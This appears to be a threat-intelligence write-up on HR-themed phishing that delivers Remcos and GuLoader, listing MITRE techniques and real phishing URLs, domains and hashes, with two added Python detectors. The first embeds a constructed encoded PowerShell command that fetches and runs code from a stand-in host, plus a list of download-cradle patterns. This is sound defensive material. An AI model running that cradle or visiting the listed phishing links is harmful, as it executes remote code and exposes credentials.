HR-themed spam campaigns are on the rise, exploiting the Great Resignation and holiday period to lure employees with targeted social engineering. Fraudsters impersonate HR reps to push links to phishing sites or attachments that download malware, aiming to harvest credentials and compromise systems. Hashtags: #ChameleonPhishing #Remcos #GuLoader #Formstack #ZohoCampaigns
Keypoints
- Threat actors exploit HR topics and holiday-related activity to maximize attention and the likelihood that users engage with the message.
- Campaigns impersonate HR messages and push links or attachments that lead to phishing sites or malware downloads.
- Multiple attack themes are shown, including Annual Leave Compliance, Termination List, Employee Satisfaction Report, Employee Handbook, and Confidentiality Agreement lures.
- Phishing chains often use multi-stage redirects, fake login pages, and obfuscated attachments to hide malicious content and capture credentials.
- Techniques include chameleon-style phishing sites, CAPTCHA challenges, and legitimate-service redirection (Zoho Campaigns, Formstack) to evade automated detection.
- Malware delivery involves a VBScript (VBE) downloader that executes PowerShell to install Remcos and GuLoader on victims' machines.
MITRE Techniques
- [T1566.002] Phishing: Spearphishing Link - The email contains a link for a supposed leave compliance report.
- [T1566.001] Phishing: Spearphishing Attachment - An email with an attachment claiming to contain employee documents.
- [T1566.003] Phishing: Spearphishing via Service - The embedded link is a URL redirector hosted by Zoho Campaigns to funnel victims to a phishing site.
- [T1027] Obfuscated/Compressed Files and Information - The attachment uses base64 encoding and other obfuscation techniques to hide its payload.
- [T1059.005] Command and Scripting Interpreter: Visual Basic - The VBE downloader uses VBScript executed via Windows Script Host.
- [T1059.001] Command and Scripting Interpreter: PowerShell - A deobfuscated PowerShell command downloads Remcos and GuLoader.
- [T1105] Ingress Tool Transfer - PowerShell downloads and stages Remcos/GuLoader from remote sources as part of the infection chain.
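The chain described in the keypoints and in T1059.005/T1059.001 above (a VBE attachment run by Windows Script Host that spawns PowerShell to fetch the payload) has a well-known detection shape: a powershell.exe child of wscript.exe or cscript.exe, often with an -EncodedCommand argument that decodes to a download cradle. The following is an added example, not code from the report or from any vendor tooling; the Sysmon-style process-creation events, the file name Employee_Handbook.vbe and the payload.invalid host are all constructed for the demonstration.

```python
import base64
import re

# PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text.
def _encode_ps(cmd: str) -> str:
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")

# Constructed Sysmon-style process-creation events (not from the report):
# a VBE lure run by Windows Script Host spawns PowerShell with an encoded
# download cradle, next to benign explorer.exe and PowerShell activity.
SAMPLE_EVENTS = [
    {"pid": 4010, "ppid": 3100, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 4120, "ppid": 4010, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\a\Downloads\Employee_Handbook.vbe"'},
    {"pid": 4130, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://payload.invalid/s')")},
    {"pid": 4200, "ppid": 4010,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\inventory.ps1"},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")
# Typical download-cradle cmdlets and classes seen in decoded PowerShell.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer",
    re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                      re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload, or the cmdline unchanged."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_script_host_to_powershell(events):
    """Flag PowerShell processes whose parent is a Windows Script Host binary."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if image_name(e["image"]) not in POWERSHELL:
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or image_name(parent["image"]) not in SCRIPT_HOSTS:
            continue
        decoded = decode_encoded_command(e["cmdline"])
        findings.append({
            "pid": e["pid"],
            "parent": image_name(parent["image"]),
            "parent_cmdline": parent["cmdline"],
            "decoded_cmdline": decoded,
            "download_cradle": bool(DOWNLOAD_CRADLE.search(decoded)),
        })
    return findings


if __name__ == "__main__":
    for f in detect_script_host_to_powershell(SAMPLE_EVENTS):
        print(f)
```

The parent/child relationship alone is the high-signal part; decoding the encoded argument and checking for a cradle only adds context for the analyst, since a legitimate script-host-to-PowerShell hop in an enterprise is rare enough to review on its own. The same parent check applies to mshta.exe and cscript.exe as well, which is why SCRIPT_HOSTS is a tuple rather than a single name.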
Indicators of Compromise
- [URL] HR-themed phishing campaign links - pub-d6a35764152345299e690fcaba91066e.r2.dev/rugaind.html#, xpncsep-zgpm.maillist-manage.com/click/1107d8d15757f4535/1107d8d15757e8355, and 2 more items
- [Domain] Domains used in phishing chain - r2.dev, maillist-manage.com, caduceusmedical.formstack.com, ujuandjule.ru (and 2 more domains)
- [File Hash] Malicious file hashes observed - f0b45089d8e6d329a1aecbc9c436faa2, c8c95a6a387113ef7117097bdc75b6e8, and 1 more hash
- [File Name] Obfuscated attachments and forms - Confidentiality Agreement form, employees.xls (and 1 more item)
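Three of the domains above (r2.dev, maillist-manage.com, formstack.com) are shared platforms that the report says the actors abuse as redirectors, so an exact-host or exact-URL match is actionable while an apex-only match is not: blocking r2.dev outright would break every Cloudflare R2 bucket in the organisation. The following added example (not code from the report) shows how to sweep proxy logs with those confidence tiers, using only the indicators listed on the page; the proxy log lines, the client addresses and the formstack form path are constructed for the demonstration.

```python
from typing import Optional, Tuple
from urllib.parse import urlsplit

# Indicators taken from the report above; the "and N more" items are not on the page.
IOC_URLS = {
    "pub-d6a35764152345299e690fcaba91066e.r2.dev/rugaind.html",
    "xpncsep-zgpm.maillist-manage.com/click/1107d8d15757f4535/1107d8d15757e8355",
}
IOC_HOSTS = {"caduceusmedical.formstack.com", "ujuandjule.ru"}
# Apex domains of legitimate services used as redirectors: low confidence on their own.
SHARED_SERVICE_APEX = {"r2.dev", "maillist-manage.com", "formstack.com"}
# Hosts carrying a known IoC URL are worth a medium-confidence hit even on other paths.
IOC_URL_HOSTS = {u.split("/", 1)[0] for u in IOC_URLS}

# Constructed proxy log (timestamp client method url status), not from the report.
SAMPLE_PROXY_LOG = """\
2023-12-18T09:14:02Z 10.0.4.21 GET https://pub-d6a35764152345299e690fcaba91066e.r2.dev/rugaind.html# 200
2023-12-18T09:14:05Z 10.0.4.21 GET https://xpncsep-zgpm.maillist-manage.com/click/1107d8d15757f4535/1107d8d15757e8355?e=1 302
2023-12-18T09:15:11Z 10.0.4.37 GET https://caduceusmedical.formstack.com/forms/constructed_form 200
2023-12-18T09:16:40Z 10.0.4.50 GET https://pub-00000000000000000000000000000000.r2.dev/static/app.js 200
2023-12-18T09:17:02Z 10.0.4.50 GET https://www.example.com/ 200
"""


def normalize_url(raw: str) -> Tuple[str, str]:
    """Return (host, host+path) with scheme, port, query and fragment removed.

    The report's first URL ends in '#', and redirector links often carry
    tracking query strings, so both are dropped before comparison.
    """
    if "://" not in raw:
        raw = "http://" + raw
    parts = urlsplit(raw)
    host = (parts.hostname or "").lower()
    path = parts.path or "/"
    return host, host + path


def classify(raw_url: str) -> Optional[Tuple[str, str]]:
    """Map a URL to (confidence, reason), or None when nothing matches."""
    host, hostpath = normalize_url(raw_url)
    if hostpath in IOC_URLS:
        return ("high", "exact IoC URL")
    if host in IOC_HOSTS:
        return ("high", "IoC host")
    if host in IOC_URL_HOSTS:
        return ("medium", "host of a known IoC URL")
    for apex in SHARED_SERVICE_APEX:
        if host == apex or host.endswith("." + apex):
            return ("low", "shared-service apex " + apex)
    return None


def scan_proxy_log(text: str):
    """Return one hit dict per log line whose URL matches an indicator tier."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        ts, client, _method, url = fields[:4]
        verdict = classify(url)
        if verdict is None:
            continue
        confidence, reason = verdict
        hits.append({"ts": ts, "client": client, "url": url,
                     "confidence": confidence, "reason": reason})
    return hits


if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(hit["confidence"], hit["client"], hit["reason"], hit["url"])
```

High-confidence hits justify a credential reset for the client's user and a look at the mailbox for the originating HR-themed message; the low tier is best used to enrich an investigation around an existing hit rather than to alert on its own.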